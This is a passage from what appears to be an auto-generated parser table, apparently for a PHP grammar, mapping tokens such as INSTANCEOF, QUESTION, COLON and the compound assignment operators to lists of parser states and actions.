one,None,None,None,-313,-314,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,155,-183,-197,-188,-253,155,155,-345,155,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,155,155,-209,155,-429,593,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,155,-238,155,155,155,-353,155,-234,-229,-189,-443,-230,-252,155,155,-333,-336,-337,-346,-443,155,-361,155,155,-218,-235,-236,-240,-392,-393,593,-380,-390,593,-402,-249,15
5,155,155,-196,155,-191,-194,155,-205,-223,-210,-231,-232,-211,593,593,593,593,593,593,593,593,-411,-412,-413,-414,-415,-416,-417,-418,593,593,593,593,None,None,None,None,-427,-381,-391,-395,-365,-366,-386,-220,155,-231,-193,-232,155,155,-222,155,-212,-213,-214,-215,-394,593,-402,593,-246,-247,-195,-443,155,-224,-216,-217,593,155,-271,593,155,593,]),'IS_GREATER_OR_EQUAL':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,156,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,156,-190,-429,-430,156,156,156,156,156,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,156,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,156,156,156,156,156,156,-348,-363,-227,-228,-349,-364,-428,156,156,-443,-443,-244,-248,-250,156,156,156,156,156,156,156,156,156,-297,-298,-299,-300,-301,-302,-303,-304,156,156,156,156,None,None,Non
e,None,-313,-314,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,156,-183,-197,-188,-253,156,156,-345,156,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,156,156,-209,156,-429,594,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,156,-238,156,156,156,-353,156,-234,-229,-189,-443,-230,-252,156,156,-333,-336,-337,-346,-443,156,-361,156,156,-218,-235,-236,-240,-392,-393,594,-380,-390,594,-402,-249,156,156,156,-196,156,-191,-194,156,-205,-223,-210,-231,-232,-211,594,594,594,594,594,594,594,594,-411,-412,-413,-414,-415,-416,-417,-418,594,594,594,594,None,None,None,None,-427,-381,-391,-395,-365,-366,-386,-220,156,-231,-193,-232,156,156,-222,156,-212,-213,-214,-215,-394,594,-402,594,-246,-247,-195,-443,156,-224,-216,-217,594,156,-271,594,156,594,]),'INSTANCEOF':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,743,745,789,791,792,794,795,798,800,801,802,804,805,817,818,854,856,873,900,902,903,905,919,936,],[-362,157,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,157,-190,-429,-430,157,157,157,157,157,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,157,157,157,-317,157,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,1
57,157,157,157,157,157,-348,-363,-227,-228,-349,-364,-428,157,157,-443,-443,-244,-248,-250,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,-314,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,157,-183,-197,-188,-253,157,157,-345,157,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,157,157,-209,157,-184,-221,-243,-245,157,-238,157,157,157,-353,157,-234,-229,-189,-443,-230,-252,157,157,-333,-336,-337,-346,-443,157,-361,157,157,-218,-235,-236,-240,-249,157,157,157,-196,157,-191,-194,157,-205,-223,-210,-231,-232,-211,-220,157,-231,-193,-232,157,157,-222,157,-212,-213,-214,-215,-246,-247,-195,-443,157,-224,-216,-217,157,-271,157,]),'QUESTION':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,743,745,789,791,792,794,795,798,800,801,802,804,805,817,818,854,856,873,900,902,903,905,919,936,],[-362,158,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,158,-190,-429,-430,158,158,158,158,158,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,158,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,158,158,158,158,158,158,-348,-363,-227,-228,-349,-364,-428,158,158,-443,
-443,-244,-248,-250,158,-289,-290,158,158,158,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,158,-183,-197,-188,-253,158,158,-345,158,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,158,158,-209,158,-184,-221,-243,-245,158,-238,-320,158,158,-353,-182,-234,-229,-189,-443,-230,-252,158,158,-333,-336,-337,-346,-443,158,-361,158,158,-218,-235,-236,-240,-249,-319,158,158,-196,158,-191,-194,158,-205,-223,-210,-231,-232,-211,-220,158,-231,-193,-232,158,158,-222,158,-212,-213,-214,-215,-246,-247,-195,-443,158,-224,-216,-217,158,-271,158,]),'RPAREN':([12,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,108,109,111,116,117,119,187,203,204,206,207,208,209,212,213,214,216,217,218,220,221,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,251,252,253,259,265,269,271,273,278,279,280,281,282,283,299,300,301,302,303,305,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,337,340,341,342,344,357,358,359,362,365,374,376,377,378,379,380,381,382,383,384,385,386,388,389,390,392,397,398,399,400,401,402,403,404,405,406,412,413,414,415,416,417,418,419,425,426,427,428,430,431,433,434,436,437,444,445,447,448,452,454,458,459,461,462,463,464,467,478,479,480,481,482,484,486,504,505,506,507,508,511,524,525,526,527,529,530,531,533,535,536,538,539,544,546,547,548,549,555,556,557,559,560,562,563,564,565,567,568,595,596,597,598,600,602,604,605,606,607,615,618,619,623,625,626,628,635,642,643,647,649,673,675,676,678,680,681,683,684,685,686,695,696,697,698,699,700,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,731,732,733,734,736,737,738,743,748,749,750,752,753,769,770,772,789,791,792,793,794,795,798,801,802,803,804,805,806,807,808,809,810,817,818,821,823,824,834,838,840,854,855,856,85
8,859,872,885,887,888,900,902,903,904,905,916,919,922,927,936,943,944,947,956,957,],[-362,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,272,273,-190,-429,-430,-443,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,-443,-443,-254,-443,-259,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,-332,-338,-339,-340,-341,416,-347,-348,-363,-443,-227,-228,-349,-364,-428,445,-267,-268,-269,477,-443,-443,-244,-248,-250,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,487,-72,-73,-75,492,498,-106,-107,501,-443,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-443,-197,-188,534,-201,-202,-203,536,-253,-255,-265,-264,-258,544,-335,546,547,-345,548,-443,-352,-443,-365,-385,-229,-366,-230,-357,-358,562,-219,-443,-209,-270,569,-429,-402,-378,-379,-382,-383,-384,-389,-430,-184,-443,-221,-243,-245,-238,-320,-443,644,-170,-171,-172,-353,-182,-234,673,-229,-189,-443,-230,-443,-443,-252,-257,-263,-333,-336,-337,-346,-443,695,-443,-443,-443,-443,-218,-235,-236,-240,702,-266,-392,-393,728,-380,-390,-443,-396,-443,-399,-402,743,-249,-319,747,-74,-443,-79,-105,-58,765,-173,-174,-196,-191,-194,793,-200,-256,-262,-334,-205,-223,-210,801,802,-231,804,805,-232,-211,-403,-404,-405,-406,-407,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,807,-395,-397,-265,-365,-366,-386,-220,-443,822,-81,-443,-80,-169,-176,-175,-231,-193,-232,-204,-199,-261,-222,-212,-213,-443,-214,-215,-443,-394,-398,-402,-401,-246,-247,868,-82,872,-59,-177,-178,-195,-260,-443,902,903,-78,920,-277,-179,-224,-216,-217,-400,934,941,-271,-276,-443,952,-275,-443,958,-274,965,]),'COMMA':([12,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,111,116,117,119,122,123,125,126,127,170,171,172,174,175,176
,177,178,187,203,204,206,207,208,209,212,213,214,216,217,221,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,265,269,271,273,278,279,280,281,282,283,298,300,301,302,303,305,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,341,342,350,357,358,359,362,365,374,376,377,378,379,380,381,382,383,384,385,386,388,389,390,392,397,398,399,400,402,406,412,413,416,418,419,425,426,427,428,430,431,433,434,436,437,444,445,447,451,452,453,454,458,459,461,462,463,464,467,474,475,478,479,480,481,482,484,486,493,495,496,497,504,505,506,507,508,511,516,520,521,524,525,526,527,529,530,531,533,535,536,538,539,544,546,547,548,549,555,556,557,559,560,562,563,564,565,567,568,595,596,598,600,605,606,607,612,615,618,619,625,633,635,642,643,647,649,651,652,673,675,676,678,680,681,683,684,685,686,695,696,697,698,699,700,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,752,769,770,772,775,780,783,785,786,789,791,792,793,794,795,798,801,802,803,804,805,806,807,808,809,810,817,818,824,834,838,840,843,854,855,856,858,859,885,887,888,896,897,900,902,903,904,919,922,926,927,943,944,945,947,948,956,957,],[-362,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,-190,-429,-430,-443,293,-20,296,-14,-15,349,-95,-96,353,-100,-102,356,-104,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,-443,404,-259,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,-332,-338,-339,-340,-341,-347,-348,-363,-443,-227,-228,-349,-364,-428,446,-267,-268,-269,-16,-443,-443,-244,-248,-250,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,490,-75,-97,499,-106,-107,502,-443,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-443,-
197,-188,535,-201,-202,-203,-253,-258,545,-335,-345,-443,-352,-443,-365,-385,-229,-366,-230,-357,-358,446,-219,-443,-209,-270,-19,-429,-21,-402,-378,-379,-382,-383,-384,-389,-430,-13,-17,-184,-443,-221,-243,-245,-238,-320,-94,-99,-101,-103,-443,645,-170,-171,-172,-353,-117,656,-149,-182,-234,446,-229,-189,-443,-230,-443,-443,-252,-257,-263,-333,-336,-337,-346,-443,446,-443,-443,-443,-443,-218,-235,-236,-240,446,-266,-392,-393,-380,-390,734,-399,-402,-18,446,-249,-319,-74,-98,-105,-58,645,-173,-174,656,-118,-196,-191,-194,535,-200,-256,-262,-334,-205,-223,-210,446,446,-231,446,446,-232,-211,-403,-404,-405,-406,-407,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,-443,-169,-176,-175,-119,845,-148,850,-145,-231,-193,-232,-204,-199,-261,-222,-212,-213,-443,-214,-215,-443,-394,-398,-402,-401,-246,-247,535,-59,-177,-178,850,-195,-260,-443,446,446,921,-277,-179,-144,-143,-224,-216,-217,-400,-271,-276,-147,-443,-275,-443,-146,645,-142,-274,645,]),'DOUBLE_ARROW':([12,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,111,116,117,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,300,301,302,303,305,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,416,418,419,426,427,428,430,431,433,434,437,445,452,458,459,461,462,463,464,467,478,480,481,482,484,486,511,524,525,527,529,530,531,536,538,544,546,547,548,549,562,563,564,565,595,596,598,600,607,618,619,626,628,673,675,676,685,686,695,698,701,702,729,730,732,736,737,738,743,753,789,791,792,794,798,801,802,804,805,807,809,817,818,854,856,872,900,902,903,919,],[-362,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-37
5,-376,-377,-225,-226,-228,-237,-239,-190,-429,-430,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,407,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,-332,-338,-339,-340,-341,-347,-348,-363,-227,-228,-349,-364,-428,-443,-443,-244,-248,-250,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,-345,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,-209,-429,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,-238,-320,-353,-182,-234,-229,-189,-443,-230,-252,682,-333,-336,-337,-346,-443,-218,-235,-236,-240,-392,-393,-380,-390,735,-249,-319,751,-79,-196,-191,-194,-205,-223,-210,-231,-232,-211,-381,-391,-395,-365,-366,-386,-220,-80,-231,-193,-232,-199,-222,-212,-213,-214,-215,-394,860,-246,-247,-195,-443,-78,-224,-216,-217,-271,]),'RBRACKET':([12,35,39,43,44,45,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,111,116,117,187,203,204,205,206,207,208,209,212,213,214,216,219,220,221,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,267,269,271,273,278,279,300,301,302,303,305,306,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,374,376,377,378,379,380,381,382,383,384,385,386,387,388,390,392,402,403,404,405,406,416,418,419,426,427,428,430,431,433,434,437,438,445,452,454,458,459,461,462,463,464,467,468,478,480,481,482,484,486,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,562,563,564,565,595,596,598,600,603,604,605,606,607,616,618,619,673,675,676,681,683,685,686,687,688,689,690,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,733,734,736,737,738,743,744,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,855,856,900,902,903,904,919,],[-362,-429
,-180,-251,-430,-443,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,-190,-429,-430,-370,-323,-324,-443,-443,-185,-186,-187,-192,-225,-228,-198,402,-254,-443,-259,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,-332,-338,-339,-340,-341,-347,-348,-363,-443,-227,-228,-349,-364,-428,-443,-443,-244,-248,-250,-241,-242,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,525,-183,-197,-188,-253,-255,-265,-264,-258,-345,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,563,-209,-429,-402,-378,-379,-382,-383,-384,-389,-430,-443,-184,-221,-243,-245,-238,-320,-353,-182,-234,-229,-189,-443,-230,-252,-257,-263,-333,-336,-337,-346,-443,-218,-235,-236,-240,-392,-393,-380,-390,732,-396,-443,-399,-402,-443,-249,-319,-196,-191,-194,-256,-262,-205,-223,-442,799,-440,-441,-210,-231,-232,-211,-403,-404,-405,-406,-407,-408,-409,-410,-411,-412,-413,-414,-415,-416,-417,-418,-419,-420,-421,-422,-423,-424,-425,-426,-427,-381,-391,-395,-397,-265,-365,-366,-386,-220,817,-231,-193,-232,-199,-261,-222,857,-212,-213,-214,-215,-394,-398,-402,-401,-246,-247,-195,-260,-443,-224,-216,-217,-400,-271,]),'COLON':([12,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,111,116,117,158,187,203,204,206,207,208,209,212,213,214,216,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,300,301,302,303,305,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,416,418,419,426,427,428,430,431,433,434,437,445,477,478,480,481,482,484,486,487,492,501,511,524,525,527,529,530,531,536,544,546,547,548,549,562,563,564,565,618,619,673,675,676,685,686,695,698,701,7
02,743,789,791,792,794,798,801,802,804,805,817,818,822,827,854,856,866,868,873,900,902,903,919,952,],[-362,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,-190,-429,-430,336,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,-332,-338,-339,-340,-341,-347,-348,-363,-227,-228,-349,-364,-428,-443,-443,-244,-248,-250,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,485,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,-345,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,-209,614,-184,-221,-243,-245,-238,-320,622,632,640,-353,-182,-234,-229,-189,-443,-230,-252,-333,-336,-337,-346,-443,-218,-235,-236,-240,-249,-319,-196,-191,-194,-205,-223,-210,-231,-232,-211,-220,-231,-193,-232,-199,-222,-212,-213,-214,-215,-246,-247,871,875,-195,-443,908,911,875,-224,-216,-217,-271,962,]),'AS':([12,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,111,116,117,127,187,203,204,206,207,208,209,212,213,214,216,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,298,300,301,302,303,305,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,343,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,416,418,419,426,427,428,430,431,433,434,437,445,478,480,481,482,484,486,511,524,525,527,529,530,531,536,544,546,547,548,549,562,563,564,565,618,619,673,675,676,685,686,695,698,701,702,743,789,791,792,794,798,801,802,804,805,817,818,854,856,900,902,903,919,932,933,959,],[-362,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,-190,-429,-430,297,-370,
-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,-332,-338,-339,-340,-341,-347,-348,-363,-227,-228,-349,-364,-428,476,-443,-443,-244,-248,-250,-289,-290,-291,-292,-293,-294,-295,-296,-297,-298,-299,-300,-301,-302,-303,-304,-305,-306,-307,-308,-309,-310,-311,-312,-313,-314,491,-181,-278,-279,-280,-281,-282,-283,-284,-285,-286,-287,-288,-183,-197,-188,-253,-345,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,-209,-184,-221,-243,-245,-238,-320,-353,-182,-234,-229,-189,-443,-230,-252,-333,-336,-337,-346,-443,-218,-235,-236,-240,-249,-319,-196,-191,-194,-205,-223,-210,-231,-232,-211,-220,-231,-193,-232,-199,-222,-212,-213,-214,-215,-246,-247,-195,-443,-224,-216,-217,-271,950,-125,-124,]),'DOUBLE_COLON':([12,27,35,44,86,87,104,106,107,111,116,117,207,209,214,215,229,232,233,234,259,278,279,334,392,408,452,464,467,469,470,472,516,529,541,563,564,565,600,652,730,775,929,933,],[-187,-190,-429,-430,260,261,-233,-237,-239,-190,-429,-430,391,-187,-233,395,-187,410,411,-233,-188,-189,-428,-190,-188,-188,-429,-187,-430,608,609,-233,-117,-189,-189,-235,-236,-240,-188,-118,-189,-119,949,-429,]),'EQUALS':([39,73,84,85,100,101,104,106,107,124,176,269,271,301,302,303,305,363,418,428,431,437,445,480,481,482,508,525,534,549,562,563,564,565,618,641,647,649,685,686,695,698,701,702,743,772,786,798,801,802,804,805,817,818,847,856,891,896,900,902,903,],[191,-206,-207,-208,-225,-226,-228,-237,-239,294,354,-227,-228,-443,-244,-248,-250,503,-443,-229,-230,-219,-209,-221,-243,-245,646,-234,679,-443,-218,-235,-236,-240,-249,764,771,773,-205,-223,-210,-231,-232,-211,-220,839,851,-222,-212,-213,-214,-215,-246,-247,894,-443,924,928,-224,-216,-217,]),'PLUS_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[192,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-44
3,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'MINUS_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[193,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'MUL_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[194,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'DIV_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[195,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'CONCAT_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[196,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'MOD_EQUAL':([39,73,84,85,100,101,104,106,
107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[197,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'AND_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[198,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'OR_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[199,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'XOR_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[200,-206,-207,-208,-225,-226,-228,-237,-239,-227,-228,-443,-244,-248,-250,-443,-229,-230,-219,-209,-221,-243,-245,-234,-443,-218,-235,-236,-240,-249,-205,-223,-210,-231,-232,-211,-220,-222,-212,-213,-214,-215,-246,-247,-443,-224,-216,-217,]),'SL_EQUAL':([39,73,84,85,100,101,104,106,107,269,271,301,302,303,305,418,428,431,437,445,480,481,482,525,549,562,563,564,565,618,685,686,695,698,701,702,743,798,801,802,804,805,817,818,856,900,902,903,],[201,-206,-207,-208,-225,-226,-228,-237,-239,-227,-2
